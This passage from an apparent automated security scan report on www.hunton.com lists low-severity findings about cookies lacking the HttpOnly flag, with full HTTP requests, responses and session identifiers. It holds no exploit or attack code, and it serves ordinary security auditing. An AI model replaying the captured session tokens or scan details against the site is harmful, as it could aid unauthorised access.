Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.243. http://www.hunton.com/ajaxBCard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /ajaxBCard.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxBCard.aspx?xpST=ajaxBCard&ajaxMode=yes&virtualPath=&uniqueness=&professional=4984 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:22 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1838; path=/
Set-Cookie: PortletId=5975402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 1365

<div id="ctl00_xprLayout_cphMainContent_ajaxBCardInfo" class="ajaxBCardInfo">
   <div class="close"><a class="ajaxPopUpClose" href="javascript:void(0);">Close</a></div>
<script language="javascript" t
...[SNIP]...
18.244. http://www.hunton.com/alan_kailer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /alan_kailer/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alan_kailer/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.245. http://www.hunton.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /contactus/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1857; path=/
Set-Cookie: PortletId=5994402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.246. http://www.hunton.com/dallas-united-states-of-america/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /dallas-united-states-of-america/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas-united-states-of-america/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1853; path=/
Set-Cookie: PortletId=5990402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.247. http://www.hunton.com/disclaimer/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.248. http://www.hunton.com/emailthispage/emdisclaimer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /emailthispage/emdisclaimer.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /emailthispage/emdisclaimer.aspx?xpST=EmailDisclaimer&n=akailer&d=hunton.com HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:23 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1858; path=/
Set-Cookie: PortletId=5995402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title> </tit
...[SNIP]...
18.249. http://www.hunton.com/files/ImageControl/3ae71a66-38dd-46b3-b631-5a5623944fc2/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_share.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/3ae71a66-38dd-46b3-b631-5a5623944fc2/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_share.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/3ae71a66-38dd-46b3-b631-5a5623944fc2/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_share.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1624
Content-Type: image/gif
Last-Modified: Mon, 21 Feb 2011 01:56:36 GMT
Accept-Ranges: bytes
ETag: "0e236926ad1cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:56 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

GIF89a4........g..{.w).....[..i........m..a..e.....S.....o..w..Q..E..c........;..M.v'.....K..I..C..s..?..k.u%....|1....}3....._..]..U...................................................................
...[SNIP]...
18.250. http://www.hunton.com/files/ImageControl/56db1668-7f9d-4143-ab08-061242989a1f/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News-and-Events.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/56db1668-7f9d-4143-ab08-061242989a1f/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News-and-Events.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/56db1668-7f9d-4143-ab08-061242989a1f/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News-and-Events.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 41189
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 20:37:02 GMT
Accept-Ranges: bytes
ETag: "0eb4b7e45cc1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:55 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

......Exif..II*.................Ducky.......<.....,Photoshop 3.0.8BIM.%..........................Adobe.d....................    ...    .......

.

.........................................................
...[SNIP]...
18.251. http://www.hunton.com/files/ImageControl/843a0930-99dd-4266-9d90-55e4d3cb4a74/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_rss.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/843a0930-99dd-4266-9d90-55e4d3cb4a74/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_rss.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/843a0930-99dd-4266-9d90-55e4d3cb4a74/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_rss.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 715
Content-Type: image/png
Last-Modified: Mon, 21 Feb 2011 01:56:34 GMT
Accept-Ranges: bytes
ETag: "0b55916ad1cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:56 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...mIDATx...OHTA...3....... i.[
Q.....;t...^....].....:t....=.+.....B.P..B.."..U..uw..if.n.u...........x.!+....OS.(I...RR.rQ...x..
...[SNIP]...
18.252. http://www.hunton.com/files/ImageControl/ae2e582d-08db-47f0-9896-42087325427a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo_print.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/ae2e582d-08db-47f0-9896-42087325427a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo_print.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/ae2e582d-08db-47f0-9896-42087325427a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo_print.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 3036
Content-Type: image/gif
Last-Modified: Mon, 21 Feb 2011 01:56:34 GMT
Accept-Ranges: bytes
ETag: "0b55916ad1cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:54 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

GIF89a..E.............{u{.........141......RQR...............JMJcec.........cac......989949.....................kek.....................RMR.....................sqskik...JEJ...sus......................
...[SNIP]...
18.253. http://www.hunton.com/files/ImageControl/c50db0f0-85f0-4d2a-801e-5c7b6ca5855a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_email.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/c50db0f0-85f0-4d2a-801e-5c7b6ca5855a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_email.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/c50db0f0-85f0-4d2a-801e-5c7b6ca5855a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_email.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1378
Content-Type: image/gif
Last-Modified: Mon, 21 Feb 2011 01:56:36 GMT
Accept-Ranges: bytes
ETag: "0e236926ad1cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:06 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

GIF89a.......................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="ado
...[SNIP]...
18.254. http://www.hunton.com/files/ImageControl/db4a4e6b-0e0c-4e10-ad7f-3f8a91fd6ef1/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/db4a4e6b-0e0c-4e10-ad7f-3f8a91fd6ef1/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

